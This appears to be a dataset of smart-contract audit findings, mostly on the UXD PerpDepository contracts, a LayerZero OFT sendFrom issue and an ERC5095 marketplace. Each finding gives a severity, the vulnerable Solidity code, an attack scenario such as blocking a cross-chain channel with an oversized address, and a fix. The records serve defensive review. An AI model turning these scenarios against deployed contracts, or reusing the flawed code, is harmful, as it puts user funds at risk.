be changed at anytime. If it is desired to make it a constant then it should at least be changed from 15 to 900.чThe mark price and by extension the position value will frequently be different from true mark price of the market allowing for larger rebalances than should be possible.ч```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n -PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow errorчmediumчPerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error\\n```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n\\n```\\n function _withdrawAsset(uint256 amount, address to) private {\\n if (amount > netAssetDeposits) {\\n revert InsufficientAssetDeposits(netAssetDeposits, amount);\\n }\\n netAssetDeposits -= amount;\\n\\n\\n vault.withdraw(address(assetToken), amount);\\n IERC20(assetToken).transfer(to, amount);\\n }\\n```\\n\\nThe problem here is that when user deposits X assets, then he receives Y UXD tokens. And when later he redeems his Y UXD tokens he can receive more or less than X assets. This can lead to situation when netAssetDeposits variable will be seting to negative value which will revert tx.\\nExample. 1.User deposits 1 WETH when it costs 1200$. As result 1200 UXD tokens were minted and netAssetDeposits was set to 1. 2.Price of WETH has decreased and now it costs 1100. 3.User redeem his 1200 UXD tokens and receives from perp protocol 1200/1100=1.09 WETH. But because netAssetDeposits is 1, then transaction will revert inside `_withdrawAsset` function with underflow error.чAs you don't use this variable anywhere else, you can remove it. Otherwise you need to have 2 variables instead: totalDeposited and totalWithdrawn.чUser can't redeem all his UXD tokens.ч```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n -Malicious user can use an excessively large _toAddress in OFTCore#sendFrom to break layerZero communicationчhighчBy default layerZero implements a blocking behavior, that is, that each message must be processed and succeed in the order that it was sent. In order to circumvent this behavior the receiver must implement their own try-catch pattern. If the try-catch pattern in the receiving app ever fails then it will revert to its blocking behavior. The _toAddress input to OFTCore#sendFrom is calldata of any arbitrary length. An attacker can abuse this and submit a send request with an excessively large _toAddress to break communication between network with different gas limits.\\n```\\nfunction sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n}\\n```\\n\\nThe _toAddress input to OFTCore#sendFrom is a bytes calldata of any arbitrary size. This can be used as follows to break communication between chains that have different block gas limits.\\nExample: Let's say that an attacker wishes to permanently block the channel Arbitrum -> Optimism. Arbitrum has a massive gas block limit, much higher than Optimism's 20M block gas limit. The attacker would call sendFrom on the Arbitrum chain with the Optimism chain as the destination. For the _toAddress input they would use an absolutely massive amount of bytes. This would be packed into the payload which would be called on Optimism. Since Arbitrum has a huge gas limit the transaction would send from the Arbitrum side but it would be so big that the transaction could never succeed on the Optimism side due to gas constraints. Since that nonce can never succeed the communication channel will be permanently blocked at the Optimism endpoint, bypassing the nonblocking behavior implemented in the OFT design and reverting to the default blocking behavior of layerZero.\\nUsers can still send messages and burn their tokens from Arbitrum -> Optimism but the messages can never be received. This could be done between any two chain in which one has a higher block gas limit. This would cause massive loss of funds and completely cripple the entire protocol.чLimit the length of _toAddress to some amount (i.e. 256 bytes) as of right now EVM uses 20 bytes address and Sol/Aptos use 32 bytes address, so for right now it could be limited to 32 bytes.\\n```\\n function sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n+ require(_toAddress.length <= maxAddressLength); \\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n }\\n```\\nчMassive loss of user funds and protocol completely crippledч```\\nfunction sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n}\\n```\\n -RageTrade senior vault USDC deposits are subject to utilization caps which can lock deposits for long periods of time leading to UXD instabilityчhighчRageTrade senior vault requires that it maintains deposits above and beyond the current amount loaned to the junior vault. Currently this is set at 90%, that is the vault must maintain at least 10% more deposits than loans. Currently the junior vault is in high demand and very little can be withdrawn from the senior vault. A situation like this is far from ideal because in the even that there is a strong depeg of UXD a large portion of the collateral could be locked in the vault unable to be withdrawn.\\nDnGmxSeniorVault.sol\\n```\\nfunction beforeWithdraw(\\n uint256 assets,\\n uint256,\\n address\\n) internal override {\\n /// @dev withdrawal will fail if the utilization goes above maxUtilization value due to a withdrawal\\n // totalUsdcBorrowed will reduce when borrower (junior vault) repays\\n if (totalUsdcBorrowed() > ((totalAssets() - assets) * maxUtilizationBps) / MAX_BPS)\\n revert MaxUtilizationBreached();\\n\\n // take out required assets from aave lending pool\\n pool.withdraw(address(asset), assets, address(this));\\n}\\n```\\n\\nDnGmxSeniorVault.sol#beforeWithdraw is called before each withdraw and will revert if the withdraw lowers the utilization of the vault below a certain threshold. This is problematic in the event that large deposits are required to maintain the stability of UXD.чI recommend three safeguards against this:\\nMonitor the current utilization of the senior vault and limit deposits if utilization is close to locking positions\\nMaintain a portion of the USDC deposits outside the vault (i.e. 10%) to avoid sudden potential liquidity crunches\\nCreate functions to balance the proportions of USDC in and out of the vault to withdraw USDC from the vault in the event that utilization threatens to lock collateralчUXD may become destabilized in the event that the senior vault has high utilization and the collateral is inaccessibleч```\\nfunction beforeWithdraw(\\n uint256 assets,\\n uint256,\\n address\\n) internal override {\\n /// @dev withdrawal will fail if the utilization goes above maxUtilization value due to a withdrawal\\n // totalUsdcBorrowed will reduce when borrower (junior vault) repays\\n if (totalUsdcBorrowed() > ((totalAssets() - assets) * maxUtilizationBps) / MAX_BPS)\\n revert MaxUtilizationBreached();\\n\\n // take out required assets from aave lending pool\\n pool.withdraw(address(asset), assets, address(this));\\n}\\n```\\n -USDC deposited to PerpDepository.sol are irretrievable and effectively causes UDX to become undercollateralizedчhighчPerpDepository rebalances negative PNL into USDC holdings. This preserves the delta neutrality of the system by exchanging base to quote. This is problematic though as once it is in the vault as USDC it can never be withdrawn. The effect is that the delta neutral position can never be liquidated but the USDC is inaccessible so UDX is effectively undercollateralized.\\n`_processQuoteMint`, `_rebalanceNegativePnlWithSwap` and `_rebalanceNegativePnlLite` all add USDC collateral to the system. There were originally two ways in which USDC could be removed from the system. The first was positive PNL rebalancing, which has now been deactivated. The second is for the owner to remove the USDC via `withdrawInsurance`.\\n```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n\\nThe issue is that `withdrawInsurance` cannot actually redeem any USDC. Since insuranceDeposited is a uint256 and is decremented by the withdraw, it is impossible for more USDC to be withdrawn then was originally deposited.\\nThe result is that there is no way for the USDC to ever be redeemed and therefore over time will lead to the system becoming undercollateralized due to its inaccessibility.чAllow all USDC now deposited into the insurance fund to be redeemed 1:1чUDX will become undercollateralized and the ecosystem will spiral out of controlч```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n -PerpDepository#getPositionValue uses incorrect value for TWAP interval allowing more than intended funds to be extractedчhighчPerpDepository#getPositionValue queries the exchange for the mark price to calculate the unrealized PNL. Mark price is defined as the 15 minute TWAP of the market. The issue is that it uses the 15 second TWAP instead of the 15 minute TWAP\\nAs stated in the docs and as implemented in the ClearHouseConfig contract, the mark price is a 15 minute / 900 second TWAP.\\n```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n\\nAs seen in the code above getPositionValue uses 15 as the TWAP interval. This means it is pulling a 15 second TWAP rather than a 15 minute TWAP as intended.чI recommend pulling pulling the TWAP fresh each time from ClearingHouseConfig, because the TWAP can be changed at anytime. If it is desired to make it a constant then it should at least be changed from 15 to 900.чThe mark price and by extension the position value will frequently be different from true mark price of the market allowing for larger rebalances than should be possible.ч```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n -`rebalanceLite` should provide a slippage protectionчmediumчUsers can lose funds while rebalancing.\\nThe protocol provides two kinds of rebalancing functions - `rebalance()` and `rebalanceLite()`. While the function `rebalance()` is protected from an unintended slippage because the caller can specify `amountOutMinimum`, `rebalanceLite()` does not have this protection. This makes the user vulnerable to unintended slippage due to various scenarios.\\n```\\nPerpDepository.sol\\n function rebalanceLite(\\n uint256 amount,\\n int8 polarity,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlLite(amount, sqrtPriceLimitX96, account);\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlLite(amount, sqrtPriceLimitX96, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n function _rebalanceNegativePnlLite(\\n uint256 amount,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n IERC20(quoteToken).transferFrom(account, address(this), amount);\\n IERC20(quoteToken).approve(address(vault), amount);\\n vault.deposit(quoteToken, amount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n IERC20(assetToken).transfer(account, baseAmount);\\n emit Rebalanced(baseAmount, quoteAmount, 0);\\n return (baseAmount, quoteAmount);\\n }\\n```\\n\\nEspecially, according to the communication with the PERP dev team, it is possible for the Perp's ClearingHouse to fill the position partially when the price limit is specified (sqrtPriceLimitX96). It is also commented in the Perp contract comments here.\\n```\\n /// @param sqrtPriceLimitX96 tx will fill until it reaches this price but WON'T REVERT\\n struct InternalOpenPositionParams {\\n address trader;\\n address baseToken;\\n bool isBaseToQuote;\\n bool isExactInput;\\n bool isClose;\\n uint256 amount;\\n uint160 sqrtPriceLimitX96;\\n }\\n```\\n\\nSo it is possible that the order is not placed to the full `amount`. As we can see in the #L626~#L628, the UXD protocol grabs the quote token of `amount` and deposits to the Perp's vault. And the unused `amount` will remain in the Perp vault while this is supposed to be returned to the user who called this rebalance function.чAdd a protection parameter to the function `rebalanceLite()` so that the user can specify the minimum out amount.чUsers can lose funds while lite rebalancing.ч```\\nPerpDepository.sol\\n function rebalanceLite(\\n uint256 amount,\\n int8 polarity,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlLite(amount, sqrtPriceLimitX96, account);\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlLite(amount, sqrtPriceLimitX96, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n function _rebalanceNegativePnlLite(\\n uint256 amount,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n IERC20(quoteToken).transferFrom(account, address(this), amount);\\n IERC20(quoteToken).approve(address(vault), amount);\\n vault.deposit(quoteToken, amount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n IERC20(assetToken).transfer(account, baseAmount);\\n emit Rebalanced(baseAmount, quoteAmount, 0);\\n return (baseAmount, quoteAmount);\\n }\\n```\\n -`PerpDepository._rebalanceNegativePnlWithSwap()` shouldn't use a `sqrtPriceLimitX96` twice.чmediumч`PerpDepository._rebalanceNegativePnlWithSwap()` shouldn't use a `sqrtPriceLimitX96` twice.\\nCurrently, `_rebalanceNegativePnlWithSwap()` uses a `sqrtPriceLimitX96` param twice for placing a perp order and swapping.\\n```\\n function _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96, //@audit \\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n```\\n\\nIn `_placePerpOrder()`, it uses the uniswap pool inside the perp protocol and uses a `spotSwapper` for the second swap which is for the uniswap as well.\\nBut as we can see here, Uniswap V3 introduces multiple pools for each token pair and 2 pools might be different and I think it's not good to use the same `sqrtPriceLimitX96` for different pools.\\nAlso, I think it's not mandatory to check a `sqrtPriceLimitX96` as it checks `amountOutMinimum` already. (It checks `amountOutMinimum` only in `_openLong()` and _openShort().)чI think we can use the `sqrtPriceLimitX96` param for one pool only and it would be enough as there is an `amountOutMinimum` condition.ч`PerpDepository._rebalanceNegativePnlWithSwap()` might revert when it should work as it uses the same `sqrtPriceLimitX96` for different pools.ч```\\n function _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96, //@audit \\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n```\\n -Vulnerable GovernorVotesQuorumFraction versionчmediumчThe protocol uses an OZ version of contracts that contain a known vulnerability in government contracts.\\n`UXDGovernor` contract inherits from GovernorVotesQuorumFraction:\\n```\\n contract UXDGovernor is\\n ReentrancyGuard,\\n Governor,\\n GovernorVotes,\\n GovernorVotesQuorumFraction,\\n GovernorTimelockControl,\\n GovernorCountingSimple,\\n GovernorSettings\\n```\\n\\nIt was patched in version 4.7.2, but this protocol uses an older version: \"@openzeppelin/contracts\": \"^4.6.0\"чUpdate the OZ version of contracts to version >=4.7.2 or at least follow the workarounds of OZ if not possible otherwise.чThe potential impact is described in the OZ advisory. This issue was assigned with a severity of High from OZ, so I am sticking with it in this submission.ч```\\n contract UXDGovernor is\\n ReentrancyGuard,\\n Governor,\\n GovernorVotes,\\n GovernorVotesQuorumFraction,\\n GovernorTimelockControl,\\n GovernorCountingSimple,\\n GovernorSettings\\n```\\n -Deposit and withdraw to the vault with the wrong decimals of amount in contract `PerpDepository`чmediumчFunction `vault.deposit` and `vault.withdraw` of vault in contract `PerpDepository` need to be passed with the amount in raw decimal of tokens (is different from 18 in case using USDC, WBTC, ... as base and quote tokens). But some calls miss the conversion of decimals from 18 to token's decimal, and pass wrong decimals into them.\\nFunction `vault.deposit` need to be passed the param amount in token's decimal (as same as vault.withdraw). You can see at function `_depositAsset` in contract PerpDepository.\\n```\\nfunction _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n \\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n}\\n```\\n\\nBut there are some calls of `vault.deposit` and `vault.withdraw` that passed the amount in the wrong decimal (18 decimal). Let's see function `_rebalanceNegativePnlWithSwap` in contract PerpDepository:\\n```\\nfunction _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n) private returns (uint256, uint256) {\\n // rest of code\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount); \\n \\n // rest of code\\n \\n vault.deposit(quoteToken, quoteAmount);\\n\\n emit Rebalanced(baseAmount, quoteAmount, shortFall);\\n return (baseAmount, quoteAmount);\\n}\\n```\\n\\nBecause function `_placePerpOrder` returns in decimal 18 (confirmed with sponsor WarTech), this calls pass `baseAmount` and `quoteAmount` in decimal 18, inconsistent with the above call. It leads to vault using the wrong decimal when depositing and withdrawing tokens.\\nThere is another case that use `vault.withdraw` with the wrong decimal (same as this case) in function _rebalanceNegativePnlLite:\\n```\\n//function _rebalanceNegativePnlLite, contract PerpDepository\\n// rest of code\\n\\n(uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n);\\nvault.withdraw(assetToken, baseAmount);\\n\\n// rest of code\\n```\\nчShould convert the param `amount` from token's decimal to decimal 18 before `vault.deposit` and `vault.withdraw`.чBecause of calling `vault.deposit` and `vault.withdraw` with the wrong decimal of the param amount, the protocol can lose a lot of funds. And some functionalities of the protocol can be broken cause it can revert by not enough allowance when calling these functions.ч```\\nfunction _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n \\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n}\\n```\\n -Price disparities between spot and perpetual pricing can heavily destabilize UXDчmediumчWhen minting UXD using PerpDepository.sol the amount of UXD minted corresponds to the amount of vUSD gained from selling the deposited ETH. This is problematic given that Perp Protocol is a derivative rather than a spot market, which means that price differences cannot be directly arbitraged with spot markets. The result is that derivative markets frequently trade at a price higher or lower than the spot price. The result of this is that UXD is actually pegged to vUSD rather than USD. This key difference can cause huge strain on a USD peg and likely depegging.\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n return quoteAmount; // @audit this mint UXD equivalent to the amount of vUSD gained\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n\\nPerpDepository#deposit shorts the deposit amount and returns the amount of vUSD resulting from the swap, which effectively pegs it to vUSD rather than USD. When the perpetual is trading at a premium arbitrage will begin happening between the spot and perpetual asset and the profit will be taken at the expense of the UXD peg.\\nExample: Imagine markets are heavily trending with a spot price of $1500 and a perpetual price of $1530. A user can now buy 1 ETH for $1500 and deposit it to mint 1530 UXD. They can then swap the UXD for 1530 USDC (or other stablecoin) for a profit of $30. The user can continue to do this until either the perpetual price is arbitraged down to $1500 or the price of UXD is $0.98.чI recommend integrating with a chainlink oracle and using its price to determine the true spot price of ETH. When a user mints make sure that the amount minted is never greater than the spot price of ETH which will prevent the negative pressure on the peg:\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n\\n+ spotPrice = assetOracle.getPrice();\\n+ assetSpotValue = amount.mulwad(spotPrice);\\n\\n- return quoteAmount;\\n+ return quoteAmount <= assetSpotValue ? quoteAmount: assetSpotValue;\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\nчUXD is pegged to vUSD rather than USD which can cause instability and loss of pegч```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n return quoteAmount; // @audit this mint UXD equivalent to the amount of vUSD gained\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n -PerpDepository#_placePerpOrder miscalculates fees paid when shortingчmediumчPerpDepository#_placePerpOrder calculates the fee as a percentage of the quoteToken received. The issue is that this amount already has the fees taken so the fee percentage is being applied incorrectly.\\n```\\nfunction _placePerpOrder(\\n uint256 amount,\\n bool isShort,\\n bool amountIsInput,\\n uint160 sqrtPriceLimit\\n) private returns (uint256, uint256) {\\n uint256 upperBound = 0; // 0 = no limit, limit set by sqrtPriceLimit\\n\\n IClearingHouse.OpenPositionParams memory params = IClearingHouse\\n .OpenPositionParams({\\n baseToken: market,\\n isBaseToQuote: isShort, // true for short\\n isExactInput: amountIsInput, // we specify exact input amount\\n amount: amount, // collateral amount - fees\\n oppositeAmountBound: upperBound, // output upper bound\\n // solhint-disable-next-line not-rely-on-time\\n deadline: block.timestamp,\\n sqrtPriceLimitX96: sqrtPriceLimit, // max slippage\\n referralCode: 0x0\\n });\\n\\n (uint256 baseAmount, uint256 quoteAmount) = clearingHouse.openPosition(\\n params\\n );\\n\\n uint256 feeAmount = _calculatePerpOrderFeeAmount(quoteAmount);\\n totalFeesPaid += feeAmount;\\n\\n emit PositionOpened(isShort, amount, amountIsInput, sqrtPriceLimit);\\n return (baseAmount, quoteAmount);\\n}\\n\\nfunction _calculatePerpOrderFeeAmount(uint256 amount)\\n internal\\n view\\n returns (uint256)\\n{\\n return amount.mulWadUp(getExchangeFeeWad());\\n}\\n```\\n\\nWhen calculating fees, `PerpDepository#_placePerpOrder` use the quote amount retuned when opening the new position. It always uses exactIn which means that for shorts the amount of baseAsset being sold is specified. The result is that quote amount returned is already less the fees. If we look at how the fee is calculated we can see that it is incorrect.\\nExample: Imagine the market price of ETH is $1000 and there is a market fee of 1%. The 1 ETH is sold and the contract receives 990 USD. Using the math above it would calculated the fee as $99 (990 * 1%) but actually the fee is $100.\\nIt have submitted this as a medium because it is not clear from the given contracts what the fee totals are used for and I cannot fully assess the implications of the fee value being incorrect.чRewrite _calculatePerpOrderFeeAmount to correctly calculate the fees paid:\\n```\\n- function _calculatePerpOrderFeeAmount(uint256 amount)\\n+ function _calculatePerpOrderFeeAmount(uint256 amount, bool isShort)\\n internal\\n view\\n returns (uint256)\\n {\\n+ if (isShort) {\\n+ return amount.divWadDown(WAD - getExchangeFeeWad()) - amount;\\n+ } else {\\n return amount.mulWadUp(getExchangeFeeWad());\\n+ }\\n }\\n```\\nчtotalFeesPaid will be inaccurate which could lead to disparities in other contracts depending on how it is usedч```\\nfunction _placePerpOrder(\\n uint256 amount,\\n bool isShort,\\n bool amountIsInput,\\n uint160 sqrtPriceLimit\\n) private returns (uint256, uint256) {\\n uint256 upperBound = 0; // 0 = no limit, limit set by sqrtPriceLimit\\n\\n IClearingHouse.OpenPositionParams memory params = IClearingHouse\\n .OpenPositionParams({\\n baseToken: market,\\n isBaseToQuote: isShort, // true for short\\n isExactInput: amountIsInput, // we specify exact input amount\\n amount: amount, // collateral amount - fees\\n oppositeAmountBound: upperBound, // output upper bound\\n // solhint-disable-next-line not-rely-on-time\\n deadline: block.timestamp,\\n sqrtPriceLimitX96: sqrtPriceLimit, // max slippage\\n referralCode: 0x0\\n });\\n\\n (uint256 baseAmount, uint256 quoteAmount) = clearingHouse.openPosition(\\n params\\n );\\n\\n uint256 feeAmount = _calculatePerpOrderFeeAmount(quoteAmount);\\n totalFeesPaid += feeAmount;\\n\\n emit PositionOpened(isShort, amount, amountIsInput, sqrtPriceLimit);\\n return (baseAmount, quoteAmount);\\n}\\n\\nfunction _calculatePerpOrderFeeAmount(uint256 amount)\\n internal\\n view\\n returns (uint256)\\n{\\n return amount.mulWadUp(getExchangeFeeWad());\\n}\\n```\\n -PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow errorчmediumчPerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error\\n```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n\\n```\\n function _withdrawAsset(uint256 amount, address to) private {\\n if (amount > netAssetDeposits) {\\n revert InsufficientAssetDeposits(netAssetDeposits, amount);\\n }\\n netAssetDeposits -= amount;\\n\\n\\n vault.withdraw(address(assetToken), amount);\\n IERC20(assetToken).transfer(to, amount);\\n }\\n```\\n\\nThe problem here is that when user deposits X assets, then he receives Y UXD tokens. And when later he redeems his Y UXD tokens he can receive more or less than X assets. This can lead to situation when netAssetDeposits variable will be seting to negative value which will revert tx.\\nExample. 1.User deposits 1 WETH when it costs 1200$. As result 1200 UXD tokens were minted and netAssetDeposits was set to 1. 2.Price of WETH has decreased and now it costs 1100. 3.User redeem his 1200 UXD tokens and receives from perp protocol 1200/1100=1.09 WETH. But because netAssetDeposits is 1, then transaction will revert inside `_withdrawAsset` function with underflow error.чAs you don't use this variable anywhere else, you can remove it. Otherwise you need to have 2 variables instead: totalDeposited and totalWithdrawn.чUser can't redeem all his UXD tokens.ч```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n -ERC5095 has not approved MarketPlace to spend tokens in ERC5095чmediumчERC5095 requires approving MarketPlace to spend the tokens in ERC5095 before calling MarketPlace.sellUnderlying/sellPrincipalToken\\nMarketPlace.sellUnderlying/sellPrincipalToken will call transferFrom to send tokens from msg.sender to pool, which requires msg.sender to approve MarketPlace. However, before calling MarketPlace.sellUnderlying/sellPrincipalToken in ERC5095, there is no approval for MarketPlace to spend the tokens in ERC5095, which causes functions such as ERC5095.deposit/mint/withdraw/redeem functions fail, i.e. users cannot sell tokens through ERC5095.\\n```\\n function sellUnderlying(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Get the number of PTs received for selling `a` underlying tokens\\n uint128 expected = pool.sellBasePreview(a);\\n\\n // Verify slippage does not exceed the one set by the user\\n if (expected < s) {\\n revert Exception(16, expected, 0, address(0), address(0));\\n }\\n\\n // Transfer the underlying tokens to the pool\\n Safe.transferFrom(IERC20(pool.base()), msg.sender, address(pool), a);\\n// rest of code\\n function sellPrincipalToken(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Preview amount of underlying received by selling `a` PTs\\n uint256 expected = pool.sellFYTokenPreview(a);\\n\\n // Verify that the 